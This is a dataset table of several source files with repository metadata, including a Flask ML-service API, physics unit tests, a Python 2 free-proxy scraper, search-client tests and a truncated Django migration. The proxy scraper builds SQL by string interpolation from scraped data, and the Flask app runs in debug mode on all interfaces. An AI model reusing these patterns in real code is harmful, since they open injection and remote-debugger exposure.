hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ea931348dc1add94d3976c115411349771183b34 | 6,818 | py | Python | src/mlServiceAPI.py | juliangruendner/ketos_brain_api | 6ec7e01a0996abb03dba090d832a5e1020df4180 | [
"MIT"
] | null | null | null | src/mlServiceAPI.py | juliangruendner/ketos_brain_api | 6ec7e01a0996abb03dba090d832a5e1020df4180 | [
"MIT"
] | null | null | null | src/mlServiceAPI.py | juliangruendner/ketos_brain_api | 6ec7e01a0996abb03dba090d832a5e1020df4180 | [
"MIT"
] | null | null | null | from flask import Flask
from flask_restful_swagger_2 import Api
from resources.userResource import UserListResource, UserResource, UserLoginResource
from resources.imageResource import ImageListResource, ImageResource
from resources.environmentResource import EnvironmentListResource, EnvironmentResource, UserEnvironmentListResource
from resources.featureResource import FeatureListResource, FeatureResource, UserFeatureListResource
from resources.featureSetResource import FeatureSetListResource, FeatureSetResource, UserFeatureSetListResource, FeatureSetFeatureListResource
from resources.mlModelResource import MLModelListResource, MLModelResource, UserMLModelListResource, MLModelPredicitionResource
from resources.mlModelResource import MLModelExportResource, MLModelImportResource, MLModelImportSuitableEnvironmentResource, MLModelImportSuitableFeatureSetResource
from resources.dataResource import DataListResource, DataResource
from resources.resourceConfigResource import ResourceConfig
from resources.annotationResource import AnnotationTaskListResource, AnnotationTaskResource, UserAnnotationTaskListResource, AnnotationTaskEntryListResource, AnnotationTaskResultListResource, AnnotatorResource
from resources.annotationResource import AnnotationTaskScaleEntryListResource, AnnotationTaskAnnotatorListResource, AnnotationResultListResource, AnnotatorResultListResource, EntriesForAnnotatorResource, AnnotationTaskScaleEntry
from resources.predictionOutcomeResource import ModelPredictionOutcomeListResource, PredictionOutcomeListResource, PredictionOutcomeResource
from resources.atlasCohortResource import AtlasCohortResource
from rdb.rdb import connect_to_db, create_all, create_admin_user, create_default_images, create_default_features
from flask_cors import CORS
import json
import logging
import logging.config
logging.config.dictConfig(json.load(open("logging_config.json", "r")))
app = Flask(__name__)
CORS(app)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
api = Api(app,
          add_api_spec_resource=True, api_version='0.0', api_spec_url='/api/swagger', schemes=["http"],  # , "https", {"securitySchemes": {"basicAuth": {"type": "http"}}}],
          security=[{"basicAuth": []}], security_definitions={"basicAuth": {"type": "basic"}})  # Wrap the Api and add /api/swagger endpoint
connect_to_db(app)
create_all()
create_admin_user()
create_default_images()
create_default_features()
api.add_resource(UserListResource, '/users', endpoint='users')
api.add_resource(UserLoginResource, '/users/login', endpoint='user_login')
api.add_resource(UserResource, '/users/<int:user_id>', endpoint='user')
api.add_resource(UserEnvironmentListResource, '/users/<int:user_id>/environments', endpoint='environments_for_user')
api.add_resource(UserMLModelListResource, '/users/<int:user_id>/models', endpoint='models_for_user')
api.add_resource(UserFeatureListResource, '/users/<int:user_id>/features', endpoint='features_for_user')
api.add_resource(UserFeatureSetListResource, '/users/<int:user_id>/featuresets', endpoint='feature_sets_for_user')
api.add_resource(EnvironmentListResource, '/environments', endpoint='environments')
api.add_resource(EnvironmentResource, '/environments/<int:env_id>', endpoint='environment')
api.add_resource(MLModelListResource, '/models', endpoint='models')
api.add_resource(MLModelResource, '/models/<int:model_id>', endpoint='model')
api.add_resource(MLModelExportResource, '/models/<int:model_id>/export', endpoint='model_export')
api.add_resource(MLModelImportResource, '/models/import', endpoint='model_import')
api.add_resource(MLModelImportSuitableEnvironmentResource, '/models/import/suitable-environments', endpoint='model_import_suitable_environments')
api.add_resource(MLModelImportSuitableFeatureSetResource, '/models/import/suitable-feature-sets', endpoint='model_import_suitable_feature_sets')
api.add_resource(MLModelPredicitionResource, '/models/<int:model_id>/prediction', endpoint='model_prediction')
api.add_resource(ImageListResource, '/images', endpoint='images')
api.add_resource(ImageResource, '/images/<int:image_id>', endpoint='image')
api.add_resource(DataListResource, '/data', endpoint='datalist')
api.add_resource(DataResource, '/data/<datarequest_id>', endpoint='data')
api.add_resource(FeatureListResource, '/features', endpoint='features')
api.add_resource(FeatureResource, '/features/<int:feature_id>', endpoint='feature')
api.add_resource(FeatureSetListResource, '/featuresets', endpoint='feature_sets')
api.add_resource(FeatureSetResource, '/featuresets/<int:feature_set_id>', endpoint='feature_set')
api.add_resource(FeatureSetFeatureListResource, '/featuresets/<int:feature_set_id>/features', endpoint='feature_set_features')
api.add_resource(ResourceConfig, '/resources_config', endpoint='resources_config')
api.add_resource(AnnotationTaskListResource, '/annotation_tasks', endpoint='annotation_tasks')
api.add_resource(AnnotationTaskResource, '/annotation_tasks/<int:task_id>', endpoint='annotation_task')
api.add_resource(UserAnnotationTaskListResource, '/users/<int:user_id>/annotation_tasks', endpoint='annotation_tasks_for_user')
api.add_resource(AnnotationTaskEntryListResource, '/annotation_tasks/<int:task_id>/entries', endpoint='entries_for_annotation_task')
api.add_resource(AnnotationTaskScaleEntryListResource, '/annotation_tasks/<int:task_id>/scale_entries', endpoint='scale_entries_for_annotation_task')
api.add_resource(AnnotationTaskAnnotatorListResource, '/annotation_tasks/<int:task_id>/annotators', endpoint='annotators_for_annotation_task')
api.add_resource(AnnotationResultListResource, '/annotation_tasks/results', endpoint='annotation_tasks_results')
api.add_resource(AnnotatorResultListResource, '/annotators/<int:annotator_id>/results', endpoint='results_for_annotator')
api.add_resource(AnnotationTaskResultListResource, '/annotation_tasks/<int:task_id>/results', endpoint='results_for_annotation_task')
api.add_resource(EntriesForAnnotatorResource, '/annotators/<string:token>/entries', endpoint='entries_for_annotators')
api.add_resource(AnnotatorResource, '/annotators/<string:token>', endpoint='annotator')
api.add_resource(AnnotationTaskScaleEntry, '/annotation_tasks/<int:task_id>/scale_entries/<int:scale_entry_id>', endpoint='scale_entry')
api.add_resource(AtlasCohortResource, '/atlas/cohorts/<int:cohort_id>/patients', endpoint='patients_for_atlas_cohort')
api.add_resource(ModelPredictionOutcomeListResource, '/models/<int:model_id>/outcomes', endpoint='prediction_outcomes')
api.add_resource(PredictionOutcomeListResource, '/models/prediction/outcomes', endpoint='model_prediction_outcome')
api.add_resource(PredictionOutcomeResource, '/models/outcomes/<int:pred_outcome_id>', endpoint='prediction_outcome')
if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port=5000)
| 80.211765 | 228 | 0.839689 | 703 | 6,818 | 7.880512 | 0.203414 | 0.045487 | 0.106137 | 0.015162 | 0.143321 | 0.061011 | 0.049819 | 0.023105 | 0.023105 | 0.023105 | 0 | 0.001691 | 0.045908 | 6,818 | 84 | 229 | 81.166667 | 0.849962 | 0.01584 | 0 | 0 | 0 | 0 | 0.288163 | 0.209153 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.302632 | 0 | 0.302632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
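The `mlServiceAPI.py` row above is mostly a table of `api.add_resource` calls pairing resource classes with Flask route templates such as `/users/<int:user_id>/models`. As a rough, stdlib-only illustration of how such converter templates match concrete paths — the mini-router below is illustrative, not part of the app, and real Flask/Werkzeug routing is considerably more elaborate:

```python
import re

def template_to_regex(template):
    # Turn one Flask-style placeholder into a named regex group:
    # 'int' -> digits only; 'string' or no converter -> "anything but a slash"
    def repl(m):
        conv, name = m.group('conv'), m.group('name')
        return '(?P<%s>%s)' % (name, r'\d+' if conv == 'int' else '[^/]+')
    pattern = re.sub(r'<(?:(?P<conv>\w+):)?(?P<name>\w+)>', repl, template)
    return re.compile('^' + pattern + '$')

def match(template, path):
    m = template_to_regex(template).match(path)
    if m is None:
        return None
    # Deliver all-digit captures as ints, mimicking Flask's int converter
    return {k: int(v) if v.isdigit() else v for k, v in m.groupdict().items()}

print(match('/users/<int:user_id>/models', '/users/7/models'))  # -> {'user_id': 7}
```

A single-pass substitution is used on purpose: substituting converters one at a time would let a later pattern re-match text inside an already-generated named group.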
ea983ff474c1e9c14d38adcbbefd09dbeedc005c | 5,529 | py | Python | tests/test_volume.py | mathieuboudreau/electropy | 586f93b076448f39255727ff36afe50edb6255bc | [
"MIT"
] | 5 | 2019-04-06T02:40:34.000Z | 2020-09-09T20:31:56.000Z | tests/test_volume.py | mathieuboudreau/electropy | 586f93b076448f39255727ff36afe50edb6255bc | [
"MIT"
] | 6 | 2019-04-06T02:40:36.000Z | 2021-03-03T17:46:07.000Z | tests/test_volume.py | mathieuboudreau/electropy | 586f93b076448f39255727ff36afe50edb6255bc | [
"MIT"
] | 1 | 2020-04-10T19:22:17.000Z | 2020-04-10T19:22:17.000Z | import unittest
from electropy.charge import Charge
import numpy as np
from electropy import volume
class VolumeTest(unittest.TestCase):
    def setUp(self):
        self.position_1 = [0, 0, 0]
        self.position_2 = [-2, 4, 1]
        self.charge = 7e-9

    def tearDown(self):
        pass

    # Potential function volume tests
    def test_potential_volume_at_point_equal_class_potential(self):
        charge = Charge(self.position_1, self.charge)
        potential_volume = volume.potential(
            [charge],
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
        )

        # Point = [-6, -6, -6]
        potential_at_point = potential_volume[4][4][4]
        expected_potential = charge.potential([-6, -6, -6])

        np.testing.assert_equal(potential_at_point, expected_potential)

    def test_two_charge_potential_volume_eq_sum_of_class_potential(self):
        charges = [Charge(self.position_1, self.charge)]
        charges.append(Charge(self.position_2, -self.charge))
        potential_volume = volume.potential(
            charges,
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
        )

        # Point = [-6, -5, -3]
        potential_at_point = potential_volume[4][5][7]
        expected_potential = np.add(
            charges[0].potential([-6, -5, -3]),
            charges[1].potential([-6, -5, -3]),
        )

        np.testing.assert_equal(potential_at_point, expected_potential)

    # Field function volume tests
    def test_field_volume_at_point_equal_class_field(self):
        charge = Charge(self.position_1, self.charge)
        field_volume = volume.field(
            [charge],
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
        )

        # Point = [-10, -6, -3]
        field_at_point = field_volume[0][4][7]
        expected_field = charge.field([-10, -6, -3])

        np.testing.assert_equal(field_at_point, expected_field)

    def test_two_charge_field_volume_eq_sum_of_class_field(self):
        charges = [Charge(self.position_1, self.charge)]
        charges.append(Charge(self.position_2, -self.charge))
        field_volume = volume.field(
            charges,
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
        )

        # Point = [-6, -5, -3]
        field_at_point = field_volume[4][5][7]
        expected_field = np.add(
            charges[0].field([-6, -5, -3]), charges[1].field([-6, -5, -3])
        )

        np.testing.assert_equal(field_at_point, expected_field)

    def test_charge_field_volume_x_components_eq_sum_of_class_field_x(self):
        charges = [Charge(self.position_1, self.charge)]
        charges.append(Charge(self.position_2, -self.charge))
        field_volume = volume.field(
            charges,
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
            component="x",
        )

        # Point = [-6, -5, -3]
        field_at_point = field_volume[4][5][7]
        expected_field = np.add(
            charges[0].field([-6, -5, -3], component="x"),
            charges[1].field([-6, -5, -3], component="x"),
        )

        np.testing.assert_equal(field_at_point, expected_field)

    def test_charge_field_volume_y_components_eq_sum_of_class_field_y(self):
        charges = [Charge(self.position_1, self.charge)]
        charges.append(Charge(self.position_2, -self.charge))
        field_volume = volume.field(
            charges,
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
            component="y",
        )

        # Point = [-6, -5, -3]
        field_at_point = field_volume[4][5][7]
        expected_field = np.add(
            charges[0].field([-6, -5, -3], component="y"),
            charges[1].field([-6, -5, -3], component="y"),
        )

        np.testing.assert_equal(field_at_point, expected_field)

    def test_charge_field_volume_z_components_eq_sum_of_class_field_z(self):
        charges = [Charge(self.position_1, self.charge)]
        charges.append(Charge(self.position_2, -self.charge))
        field_volume = volume.field(
            charges,
            x_range=[-10, 10],
            y_range=[-10, 10],
            z_range=[-10, 10],
            h=1,
            component="z",
        )

        # Point = [-6, -5, -3]
        field_at_point = field_volume[4][5][7]
        expected_field = np.add(
            charges[0].field([-6, -5, -3], component="z"),
            charges[1].field([-6, -5, -3], component="z"),
        )

        np.testing.assert_equal(field_at_point, expected_field)

    def test_field_returns_singleton_dim_for_single_slice(self):
        charge = Charge(self.position_1, self.charge)
        field_volume = volume.field(
            [charge],
            x_range=[-10, 10],
            y_range=[1, 1],
            z_range=[-10, 10],
            h=0.1,
        )

        expected_shape = (201, 1, 201)
        actual_shape = field_volume.shape

        np.testing.assert_equal(actual_shape, expected_shape)

    def test__arange_almost_equals_numpy_arange(self):
        actual = volume._arange(-10, 10, 0.1)  # Mine is rounder anyways =)
        expected = np.arange(-10, 10 + 0.1, 0.1)

        np.testing.assert_almost_equal(actual, expected)
| 28.06599 | 76 | 0.558691 | 707 | 5,529 | 4.100424 | 0.09901 | 0.034495 | 0.071404 | 0.052432 | 0.772335 | 0.705071 | 0.619524 | 0.591928 | 0.578475 | 0.541911 | 0 | 0.061622 | 0.304395 | 5,529 | 196 | 77 | 28.209184 | 0.692148 | 0.042322 | 0 | 0.556391 | 0 | 0 | 0.001703 | 0 | 0 | 0 | 0 | 0 | 0.067669 | 1 | 0.082707 | false | 0.007519 | 0.030075 | 0 | 0.120301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
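The last test in `test_volume.py` compares `volume._arange(-10, 10, 0.1)` against an endpoint-inclusive `np.arange(-10, 10 + 0.1, 0.1)`, and the inline comment hints that the custom version also rounds its values. A minimal pure-Python sketch of such an inclusive, rounding range — illustrative only; the real `volume._arange` may be implemented differently:

```python
import math

def inclusive_arange(start, stop, step):
    # Endpoint-inclusive arange that rounds each value to a precision derived
    # from the step, avoiding 0.30000000000000004-style floating-point drift
    decimals = max(0, -math.floor(math.log10(step)))
    n = int(round((stop - start) / step))
    return [round(start + i * step, decimals) for i in range(n + 1)]

print(inclusive_arange(-10, 10, 0.1)[:3])  # -> [-10.0, -9.9, -9.8]
```

With `h=0.1` on `[-10, 10]` this yields 201 points per axis, which is exactly the `(201, 1, 201)` shape the singleton-slice test above asserts.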
ea9d55f992bddeb052a30ca5d5fa389dffc4128f | 2,877 | py | Python | auctionCrawler/poxy.py | wd18535470628/PythonCraw | 9be3519da1219ad4ffc0d26cc97ceabcb0a7c06b | [
"Apache-2.0"
] | null | null | null | auctionCrawler/poxy.py | wd18535470628/PythonCraw | 9be3519da1219ad4ffc0d26cc97ceabcb0a7c06b | [
"Apache-2.0"
] | null | null | null | auctionCrawler/poxy.py | wd18535470628/PythonCraw | 9be3519da1219ad4ffc0d26cc97ceabcb0a7c06b | [
"Apache-2.0"
] | null | null | null | #-*- coding=utf-8 -*-
import urllib2, time, datetime
from lxml import etree
import sqlite3
class getProxy():
    def __init__(self):
        self.user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.header = {"User-Agent": self.user_agent}
        self.dbname = "proxy.db"
        self.now = time.strftime("%Y-%m-%d")

    def getContent(self, num):
        nn_url = "http://www.xicidaili.com/nn/" + str(num)
        # Domestic high-anonymity proxy list
        req = urllib2.Request(nn_url, headers=self.header)
        resp = urllib2.urlopen(req, timeout=10)
        content = resp.read()
        et = etree.HTML(content)
        result_even = et.xpath('//tr[@class=""]')
        result_odd = et.xpath('//tr[@class="odd"]')
        # The page source splits rows into separate even/odd classes, so the most
        # convenient lxml approach is to fetch the two classes separately.
        # A single combined query initially produced many mismatched rows -- the
        # site probably changes its markup regularly to deter other crawlers.
        # Fetching the classes separately extracts IP and port reliably no matter
        # how the page layout shifts.
        for i in result_even:
            t1 = i.xpath("./td/text()")[:2]
            print "IP:%s\tPort:%s" % (t1[0], t1[1])
            if self.isAlive(t1[0], t1[1]):
                self.insert_db(self.now, t1[0], t1[1])
        for i in result_odd:
            t2 = i.xpath("./td/text()")[:2]
            print "IP:%s\tPort:%s" % (t2[0], t2[1])
            if self.isAlive(t2[0], t2[1]):
                self.insert_db(self.now, t2[0], t2[1])

    def insert_db(self, date, ip, port):
        dbname = self.dbname
        try:
            conn = sqlite3.connect(dbname)
        except:
            print "Error opening database %s" % self.dbname
        create_tb = '''
        CREATE TABLE IF NOT EXISTS PROXY
        (DATE TEXT,
        IP TEXT,
        PORT TEXT
        );
        '''
        conn.execute(create_tb)
        insert_db_cmd = '''
        INSERT INTO PROXY (DATE,IP,PORT) VALUES ('%s','%s','%s');
        ''' % (date, ip, port)
        conn.execute(insert_db_cmd)
        conn.commit()
        conn.close()

    def loop(self, page):
        for i in range(1, page):
            self.getContent(i)

    # Check whether a crawled proxy IP is still usable
    def isAlive(self, ip, port):
        proxy = {'http': ip + ':' + port}
        print proxy
        # install_opener makes this proxy the global default for urllib2
        proxy_support = urllib2.ProxyHandler(proxy)
        opener = urllib2.build_opener(proxy_support)
        urllib2.install_opener(opener)
        # Verify the proxy works by fetching the Tencent homepage through it
        test_url = "http://www.qq.com"
        req = urllib2.Request(test_url, headers=self.header)
        try:
            # timeout is set to 10; lower it if you cannot tolerate that much proxy latency
            resp = urllib2.urlopen(req, timeout=10)
            if resp.code == 200:
                print "work"
                return True
            else:
                print "not work"
                return False
        except:
            print "Not work"
            return False


if __name__ == "__main__":
    now = datetime.datetime.now()
    print "Start at %s" % now
    obj = getProxy()
    obj.loop(5) | 30.284211 | 91 | 0.54814 | 355 | 2,877 | 4.343662 | 0.391549 | 0.02594 | 0.01751 | 0.011673 | 0.129702 | 0.09987 | 0.035019 | 0.035019 | 0.035019 | 0.035019 | 0 | 0.030257 | 0.31074 | 2,877 | 95 | 92 | 30.284211 | 0.747353 | 0.083768 | 0 | 0.108108 | 0 | 0.013514 | 0.180746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.040541 | null | null | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
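`insert_db` in `poxy.py` interpolates values straight into the SQL string with `%`, which breaks on any value containing a quote and is SQL-injection-prone. A safer sketch of the same table using `sqlite3` placeholders (written for Python 3, unlike the Python 2 original):

```python
import sqlite3

def insert_proxy(conn, date, ip, port):
    conn.execute("CREATE TABLE IF NOT EXISTS PROXY (DATE TEXT, IP TEXT, PORT TEXT)")
    # '?' placeholders let sqlite3 escape the values itself -- no quoting
    # bugs, no injection via a hostile value
    conn.execute("INSERT INTO PROXY (DATE, IP, PORT) VALUES (?, ?, ?)",
                 (date, ip, port))
    conn.commit()

conn = sqlite3.connect(":memory:")
insert_proxy(conn, "2020-01-01", "1.2.3.4", "8080")
print(conn.execute("SELECT IP, PORT FROM PROXY").fetchall())  # -> [('1.2.3.4', '8080')]
```

Reusing one connection per batch, as sketched here, also avoids the original's pattern of reconnecting and re-creating the table on every single insert.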
ea9e52a902c07d07faf47b9e8450b5190bcaf693 | 214 | py | Python | Agents/utils/readMonFiles.py | mbay-SAG/cumulocity-thinedge-example | e0fa9a52fab16ad791093e0ab3d4383c653a10fd | [
"Apache-2.0"
] | 1 | 2021-03-12T12:22:46.000Z | 2021-03-12T12:22:46.000Z | Agents/utils/readMonFiles.py | mbay-SAG/cumulocity-thinedge-example | e0fa9a52fab16ad791093e0ab3d4383c653a10fd | [
"Apache-2.0"
] | 2 | 2020-11-20T16:58:35.000Z | 2020-11-25T15:37:06.000Z | Agents/utils/readMonFiles.py | SoftwareAG/cumulocity-thinedge-example | 6311a7f2e3d6515b85af5de24758f799e389aaed | [
"Apache-2.0"
] | null | null | null | import sys
def content(name):
    try:
        with open('../apama-mqtt-connect/monitors/' + str(name) + '.mon', 'r') as file:
            data = file.read()
            return data
    except:
        return []
| 19.454545 | 87 | 0.509346 | 25 | 214 | 4.36 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.336449 | 214 | 10 | 88 | 21.4 | 0.767606 | 0 | 0 | 0 | 0 | 0 | 0.168224 | 0.14486 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ea9e964b93453f94a10dfd91125416960a5c91b6 | 1,046 | py | Python | tests/test_search.py | capellaspace/console-client | bad631f207043231630c9b8c0893a1b4382d4061 | [
"MIT"
] | 23 | 2021-07-28T19:32:25.000Z | 2022-03-19T07:57:36.000Z | tests/test_search.py | capellaspace/console-client | bad631f207043231630c9b8c0893a1b4382d4061 | [
"MIT"
] | 6 | 2021-07-16T22:31:56.000Z | 2022-03-11T21:09:40.000Z | tests/test_search.py | capellaspace/console-client | bad631f207043231630c9b8c0893a1b4382d4061 | [
"MIT"
] | 1 | 2022-01-05T18:38:46.000Z | 2022-01-05T18:38:46.000Z | #!/usr/bin/env python
import pytest
from .test_data import get_search_test_cases, search_catalog_get_stac_ids
from capella_console_client import client
from capella_console_client.validate import _validate_uuid
from capella_console_client.search import _paginated_search
@pytest.mark.parametrize("search_args,expected", get_search_test_cases())
def test_search(search_args, expected, search_client):
    search_client.search(**search_args)
    assert client._paginated_search.call_args[0][1] == expected


def test_validate_uuid_raises():
    with pytest.raises(ValueError):
        _validate_uuid("123")


def test_paginated_search_single_page(single_page_search_client):
    results = _paginated_search(single_page_search_client._sesh, payload={"limit": 1})
    assert len(results) == 1
    assert results[0] == search_catalog_get_stac_ids()["features"][0]


def test_paginated_search_multi_page(multi_page_search_client):
    results = _paginated_search(multi_page_search_client._sesh, payload={"limit": 10})
    assert len(results) == 10
| 33.741935 | 86 | 0.799235 | 145 | 1,046 | 5.317241 | 0.303448 | 0.116732 | 0.083009 | 0.093385 | 0.241245 | 0.181582 | 0 | 0 | 0 | 0 | 0 | 0.013934 | 0.108031 | 1,046 | 30 | 87 | 34.866667 | 0.812433 | 0.01912 | 0 | 0 | 0 | 0 | 0.04 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.210526 | false | 0 | 0.263158 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
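The two `_paginated_search` tests above exercise single- and multi-page behavior through mocked clients. The general pattern presumably under test — keep fetching pages until the requested limit is reached or a page comes back empty — can be sketched without any Capella-specific code (`fetch_page` and the page numbering here are illustrative):

```python
def paginated_search(fetch_page, limit):
    # Accumulate results page by page; stop on an empty page or once
    # 'limit' items have been collected
    results, page = [], 0
    while len(results) < limit:
        batch = fetch_page(page)
        if not batch:
            break
        results.extend(batch)
        page += 1
    return results[:limit]

pages = {0: ['a', 'b'], 1: ['c', 'd'], 2: []}
print(paginated_search(lambda p: pages.get(p, []), 3))  # -> ['a', 'b', 'c']
```

The empty-page check matters: without it, a limit larger than the total result count would loop forever.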
575f3985ac6999b8a0ba401f38fcd2e12e1655c9 | 2,109 | py | Python | app_jumanji/migrations/0007_resume.py | arifgafizov/jumanji_v2 | e06ec7556544abef66b35cace5a0456f6021bcca | [
"MIT"
] | 1 | 2021-12-02T11:23:39.000Z | 2021-12-02T11:23:39.000Z | app_jumanji/migrations/0007_resume.py | arifgafizov/jumanji_v2 | e06ec7556544abef66b35cace5a0456f6021bcca | [
"MIT"
] | null | null | null | app_jumanji/migrations/0007_resume.py | arifgafizov/jumanji_v2 | e06ec7556544abef66b35cace5a0456f6021bcca | [
"MIT"
] | null | null | null | # Generated by Django 3.0.8 on 2020-08-16 18:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('app_jumanji', '0006_auto_20200815_2218'),
    ]

    operations = [
        migrations.CreateModel(
            name='Resume',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
